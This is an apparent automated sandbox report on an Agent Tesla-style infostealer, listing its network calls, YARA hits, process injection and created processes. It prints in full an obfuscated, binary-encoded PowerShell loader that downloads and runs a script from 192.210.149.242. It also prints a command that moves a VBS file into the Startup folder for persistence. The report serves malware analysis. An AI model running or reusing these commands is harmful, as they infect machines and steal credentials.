19,>_B6,>_D4,>_48,>_D0,>_66,>_0E,>_1A,>_70,>_83,>_31,>_C0,>_A1,>_E8,>_98,>_81,>_0E,>_98,>_07,>_5B,>_80,>_59,>_36,>_44,>_C8,>_1E,>_2B,>_E2,>_9B,>_E9,>_90,>_B9,>_68,>_80,>_90,>_06,>_96,>_A4,>_EA,>_A8,>_F1,>_68,>_3A,>_3A,>_66,>_D0,>_3B,>_4C,>_15,>_1B,>_0D,>_CF,>_09,>_77,>_0A,>_BA,>_59,>_78,>_94,>_B9,>_27,>_14,>_22,>_60,>_2D,>_4C,>_6D,>_54,>_BC,>_76,>_E8,>_30,>_79,>_64,>_4E,>_DB,>_F0,>_5B,>_07,>_18,>_58,>_41,>_EE,>_13,>_23,>_0E,>_9B,>_89,>_91,>_CF,>_66,>_78,>_7C,>_1C,>_77,>_3C,>_51,>_76,>_1E,>_C5,>_4C,>_29,>_DD,>_41,>_67,>_61,>_B7,>_B3,>_B0,>_DB,>_59,>_C4,>_ED,>_2C,>_EC,>_76,>_3B,>_EC,>_54,>_16,>_76,>_2A,>_00,>_1B,>_0C,>_78,>_4C,>_65,>_A0,>_29,>_DF,>_2C,>_96,>_9A,>_32,>_D4,>_94,>_0C,>_7D,>_CC,>_20,>_21,>_46,>_53,>_E3,>_58,>_42,>_B1,>_81,>_42,>_5A,>_E1,>_28,>_53,>_BE,>_75,>_80,>_37,>_82,>_AA,>_46,>_85,>_97,>_3D,>_5D,>_8D,>_9D,>_C7,>_A6,>_AA,>_61,>_56,>_20,>_94,>_50,>_28,>_E1,>_50,>_22,>_A1,>_C4,>_40,>_89,>_85,>_12,>_0F,>_65,>_02,>_14,>_21,>_94,>_64,>_28,>_A9,>_50,>_32
Data received	_F0,>_F4,>_5E,>_25,>_53,>_9A,>_91,>_62,>_A7,>_94,>_63,>_62,>_B1,>_4C,>_F9,>_0F,>_A5,>_D0,>_B4,>_D3,>_DA,>_79,>_D6,>_19,>_93,>_EE,>_06,>_9A,>_63,>_35,>_B2,>_C0,>_23,>_13,>_80,>_ED,>_C1,>_06,>_B0,>_10,>_03,>_BD,>_F1,>_C0,>_2E,>_D3,>_97,>_22,>_3D,>_70,>_1D,>_25,>_E4,>_CA,>_84,>_3B,>_91,>_60,>_7F,>_25,>_95,>_FE,>_65,>_B8,>_85,>_F5,>_35,>_AA,>_C9,>_49,>_B9,>_BD,>_64,>_6E,>_E5,>_04,>_F9,>_CA,>_91,>_15,>_2A,>_A7,>_BB,>_A4,>_5B,>_BC,>_38,>_92,>_67,>_5D,>_60,>_28,>_6F,>_81,>_BB,>_D3,>_4D,>_E2,>_D3,>_6A,>_2E,>_E8,>_42,>_27,>_B1,>_9A,>_16,>_D3,>_F7,>_76,>_69,>_8B,>_E1,>_CC,>_6C,>_74,>_C2,>_AA,>_F1,>_66,>_FD,>_28,>_23,>_1A,>_4F,>_97,>_65,>_02,>_7D,>_A9,>_8A,>_E7,>_E4,>_97,>_5F,>_78,>_B0,>_D3,>_84,>_46,>_30,>_FC,>_EA,>_2E,>_F0,>_57,>_5D,>_24,>_1E,>_92,>_85,>_76,>_79,>_A4,>_27,>_B7,>_FF,>_0D,>_70,>_E0,>_52,>_02,>_38,>_49,>
Data received	_96,>_7D,>_4C,>_02,>_9C,>_1E,>_B8,>_4C,>_3B,>_B0,>_6A,>_20,>_5E,>_64,>_44,>_B1,>_CC,>_59,>_4E,>_39,>_81,>_CB,>_19,>_34,>_75,>_EE,>_10,>_99,>_18,>_F0,>_24,>_D7,>_8E,>_D7,>_9B,>_78,>_ED,>_E0,>_D7,>_9B,>_4D,>_D5,>_6A,>_ED,>_F8,>_47,>_B5,>_F2,>_4E,>_EF,>_7F,>_66,>_00,>_9B,>_96,>_50,>_55,>_0E,>_A1,>_2A,>_3F,>_AF,>_62,>_18,>_97,>_CB,>_2A,>_87,>_05,>_72,>_29,>_ED,>_2D,>_99,>_D6,>_07,>_95,>_5D,>_6D,>_54,>_B6,>_55,>_26,>_FE,>_50,>_CD,>_AB,>_DA,>_AB,>_29,>_26,>_8C,>_DE,>_A1,>_5A,>_6A,>_90,>_C8,>_3B,>_AE,>_2A,>_9A,>_F4,>_6F,>_22,>_BF,>_8D,>_90,>_86,>_11,>_23,>_8C,>_CA,>_AF,>_A2,>_C0,>_7A,>_DB,>_09,>_F8,>_86,>_A5,>_65,>_30,>_D5,>_A3,>_1F,>_F2,>_78,>_3C,>_FE,>_FC,>_C3,>_52,>_C1,>_6D,>_C5,>_88,>_54,>_DE,>_0D,>_6C,>_48,>_1C,>_7E,>_DE,>_48,>_9C,>_98,>_4C,>_9C,>_64,>_2E,>_E1,>_C4,>_F5,>_D8,>_2D,>_86,>_34,>_05,>_AF,>_84,>_58,>_E0,>_1D,>_7E,>_D7,>_45,>_50,>_07,>_31,>_B6,>_F1,>_D9,>_D5,>_3C,>_E9,>_8F,>_96,>_98,>_F8,>_8A,>_E0,>_10,>_DF,>_5D,>_47,>_5B,>_9F,>_ED,>_22,>_F5,>_0A,>_9E,>_E7,>_91,>_42,>_4A,>_CE,>_8B,>_A4,>_95,>_8A,>_F5,>_F5,>_5D,>_0C,>_15,>_F7,>_F6,>_40,>_3C,>_EF,>_5F,>_86,>_95,>_8A,>_2C,>_51,>_56,>_0D,>_07,>_28,>_3E,>_93,>_69,>_BF,>_37,>_BA,>_C0,>_0F,>_9D,>_D7,>_6E,>_92,>_E9,>_F0,>_9C,>_13,>_72,>_FC,>_2E,>_88,>_82,>_BA,>_5C,>_78,>_54,>_A3,>_95,>_CC,>_41,>_9F,>_D8,>_7C,>_E2,>_EC,>_3F,>_A9,>_08,>_7C,>_45,>_B7,>_DA,>_5F,>_B9,>_B6,>_46,>_BC,>_46,>_13,>_B7,>_26,>_7A,>_9B,>_59,>_3B,>_56,>_E5,>_11,>_23,>_66,>_62,>_3D,>_40,>_C1,>_AC,>_1A,>_8F,>_D8,>_5D,>_9D,>_50,>_60,>_FF,>_AC,>_4A,>_F5,>_12,>_BA,>_1C,>_F6,>_A2,>_76,>_A5,>_B6,>_7A,>_23,>_B0,>_6E,>_74,>_3F,>_7D,>_CF,>_3E,>_50,>_09,>_44,>_6B,>_EA,>_1B,>_55,>_5E,>_D1,>_FE,>_0B,>_03,>_48,>_1E,>_01,>_F9,>_66,>_8D,>_92,>_F0,>_5E,>_CA,>_DE,>_27,>_0A,>_E8,>_E0,>_68,>_FA,>_35,>_74,>_B5,>_46,>_80,>_62,>_B4,>_66,>_F9,>_4E,>_00,>_4C,>_9B,>_3C,>_DA,>_C0,>_46,>_3A,>_9B,>_D4,>_78,>_7D,>_5B,>_0A,>_A8,>_03,>_6A,>_FC,>_15,>_F4,>_57,>_7F,>_4B,>_1B,>_BA,>_A7,>_B8,>_8C,>_DF,>_BE,>_46,>_C0,>_D4,>_C7,>_93,>_2E,>_DE,>_C3,>_43,>_8E,>_1A,>_FF,>_44,>_E4,>_1F,>_A5,>_1C,>_4E,>_DB,>_E2,>_EF,>_F4,>_11,>_D6,>_83,>_11,>_48,>_35,>_3D,>_E9,>_C4,>_B3,>_61,>_97,>_D2,>_48,>_F1,>_AF,>_B8,>_08,>_87,>_0B,>_A3,>_B0,>_FF,>_29,>_44,>_37,>_D3,>_9F,>_27,>_B3,>_4F,>_18,>_69,>_FB,>_29,>_BA,>_E5,>_7D,>_A4,>_59,>_29,>_AD,>_86,>_3F,>_F6,>_0B,>_D4,>_F2,>_E4,>_BA,>_0F,>_14,>_30,>_FF,>_79,>_7C,>_68,>_BB,>_98,>_0A,>_3D,>_F5,>_81,>_F1,>_A1,>_F3,>_62,>_94,>_C1,>_F9,>_41,>_96,>_19,>_4C,>_F1,>_2D,>_C3,>_51,>_C6,>_96,>_04,>_54,>_CA,>_85,>_06,>_27,>_0A,>_4D,>_E4,>_78,>_6E,>_22,>_EE,>_BF,>_D8,>_C0,>_C8,>_61,>_A4,>_05,>_6C,>_FE,>_25,>_80,>_F2,>_BC,>_51,>_13,>_F5,>_DE,>_93,>_16,>_CA,>_9D,>_DC,>_B4,>_B2,>_E5,>_79,>_E9,>_5F,>_65,>_9D,>_7A,>_45,>_E5,>_53,>_15,>_9D,>_BE,>_3C,>_F2,>_48,>_B5,>_A9,>_EE,>_62,>_7E,>_82,>_6A,>_A4,>_52,>_62,>_EA,>_B3,>_2C,>_73,>_58,>_BF,>_D2,>_B0,>_5A,>_F0,>_EC,>_6D,>_38,>_9E,>_A6,>_50,>_51,>_1C,>_0E,>_45,>_73,>_1D,>_EB,>_D0,>_E4,>_CA,>_ED,>_82,>_9F,>_1E,>_E1,>_DB,>_8B,>_F2,>_E2,>_77,>_75,>_7A,>_11,>_CF,>_95,>_42,>_27,>_F0,>_69,>_C9,>_B1,>_4F,>_30,>_BB,>_DB,>_F1,>_36,>_45,>_69,>_A5,>_74,>_C9,>_A8,>_56,>_CF,>_4C,>_83,>_D9,>_5A,>_81,>_68,>_AA,>_86,>_81,>_3E,>_8A,>_BB,>_61,>_A4,>_4F,>_9C,>_7F,>_89,>_2D,>_81,>_45,>_1F,>_61,>_A4,>_F8,>_49,>_CB,>_7C,>_88,>_B9,>_0F,>_E3,>_38,>_B2,>_76,>_3C,>_3F,>_FE,>_1B,>_D5,>_6F,>_2E,>_96,>_72,>_B5,>_F7,>_EB,>_09,>_93,>_CF,>_9B,>_94,>_F8,>_87,>_43,>_68,>_D2,>_64,>_B5,>_03,>_AD,>_FA,>_3B,>_1E,>_C1,>_26,>_D3,>_C7,>_B1,>_2C,>_D8,>_6C,>_7B,>_84,>_5F,>_C8,>_58,>_E0,>_65,>_FA,>_2B,>_12,>_71,>_A

Poweshell is sending data to a remote host (1 event)

Data sent

GET /nokey.jpg HTTP/1.1 Host: 192.210.149.242 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 20, 2022, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 20, 2022, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (38 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Run a KeyLogger	rule	KeyLogger
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	browser info stealer	rule	infoStealer_browser_Zero
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

192.210.149.242

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 20, 2022, 10:07 a.m.	process_identifier: 2492 region_size: 503808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000047c	1	0	0

A potential heapspray has been detected. 84 megabytes was sprayed onto the heap of the powershell.exe process (1 event)

count

1347

name

heapspray

process

powershell.exe

total_mb

length

65536

protection

PAGE_READWRITE

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ýð2w\$\$\$- $\$- ¯$?\$- ®$\$éØ$\$1$\$¢Ï_%\$¢ÏY%£\$¢ÏX%»\$éÏ$\$]$µ\$ÏU%Æ\$Ï£$\$Ï^%\$Rich\$PEL+[rbà0@@°8ð Kp8ð{8\|(\|@@°.text}.0 `.rdatap@r4@@.data¼?À¦@À.tls ´@À.gfids0¶@@.rsrcK Lº@@.reloc8p:@B base_address: 0x00400000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ lEpEjE..pÁFLÖFLÖFLÖFLÖFLÖFLÖFLÖFLÖFLÖFtÁFPÖFPÖFPÖFPÖFPÖFPÖFPÖFxÁFÿÿÿÿpEÂFÂFÂFÂFÂFxÁFðEpE¸EØÁFpÇFCPSTPDT ÂFàÂFÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZpÇFþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨3ðqF¨AüqFN!ArFmAtFE.?AVtype_info@@tFE.?AVbad_alloc@std@@tFE.?AVbad_array_new_length@std@@tFE.?AVlogic_error@std@@tFE.?AVlength_error@std@@tFE.?AVout_of_range@std@@tFE.?AV_Facet_base@std@@tFE.?AV_Locimp@locale@std@@tFE.?AVfacet@locale@std@@tFE.?AU_Crt_new_delete@std@@tFE.?AVcodecvt_base@std@@tFE.?AUctype_base@std@@tFE.?AV?$ctype@D@std@@tFE.?AV?$codecvt@DDU_Mbstatet@@@std@@tFE.?AVbad_exception@std@@tFE.HtFE.?AVfailure@ios_base@std@@tFE.?AVruntime_error@std@@tFE.?AVsystem_error@std@@tFE.?AVbad_cast@std@@tFE.?AV_System_error@std@@tFE.?AVexception@std@@ base_address: 0x0046c000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: base_address: 0x00470000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: %ü üg>g>çg> g>;°Í`w`JCCÞ¸~¸Çg>g>PM£L¡mÍVÇ1ÃÖ@ß@ßA¾Cf>£Á½Ô§×ôÝDàØÛMéÄT C% b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x00471000 process_identifier: 2492 process_handle: 0x0000047c	1	1
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2492 process_handle: 0x0000047c	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 20, 2022, 10:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ýð2w\$\$\$- $\$- ¯$?\$- ®$\$éØ$\$1$\$¢Ï_%\$¢ÏY%£\$¢ÏX%»\$éÏ$\$]$µ\$ÏU%Æ\$Ï£$\$Ï^%\$Rich\$PEL+[rbà0@@°8ð Kp8ð{8\|(\|@@°.text}.0 `.rdatap@r4@@.data¼?À¦@À.tls ´@À.gfids0¶@@.rsrcK Lº@@.reloc8p:@B base_address: 0x00400000 process_identifier: 2492 process_handle: 0x0000047c	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send May 20, 2022, 10:07 a.m.	buffer: GET /nokey.jpg HTTP/1.1 Host: 192.210.149.242 Connection: Keep-Alive socket: 1420 sent: 74	1	74	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3060 called NtSetContextThread to modify thread in remote process 2492
NtSetContextThread May 20, 2022, 10:07 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4395778 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000464 process_identifier: 2492	1	0	0

One or more non-whitelisted processes were created (5 events)

parent_process	powershell.exe	martian_process	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
parent_process	wscript.exe	martian_process	Powershell $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110001,00110100,00111001,00101110,00110010,00110100,00110010,00101111,01101110,01101111,01101011,01100101,01111001,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };([system.String]::Join('', $gf))\|P
parent_process	wscript.exe	martian_process	Powershell Move-item 'C:\Users\test22\AppData\Local\Temp\edi.vbs' -Destination 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\edi.vbs'

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2772 resumed a thread in remote process 3060
Process injection	Process 2772 resumed a thread in remote process 788
Process injection	Process 3060 resumed a thread in remote process 2492
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000330 suspend_count: 1 process_identifier: 3060	1	0	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 788	1	0	0
NtResumeThread May 20, 2022, 10:07 a.m.	thread_handle: 0x00000464 suspend_count: 1 process_identifier: 2492	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (26 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW May 20, 2022, 10:07 a.m.	thread_identifier: 3064 thread_handle: 0x00000330 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t0='ZE95'.replace('Z','I').replace('95','x');sal P $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,0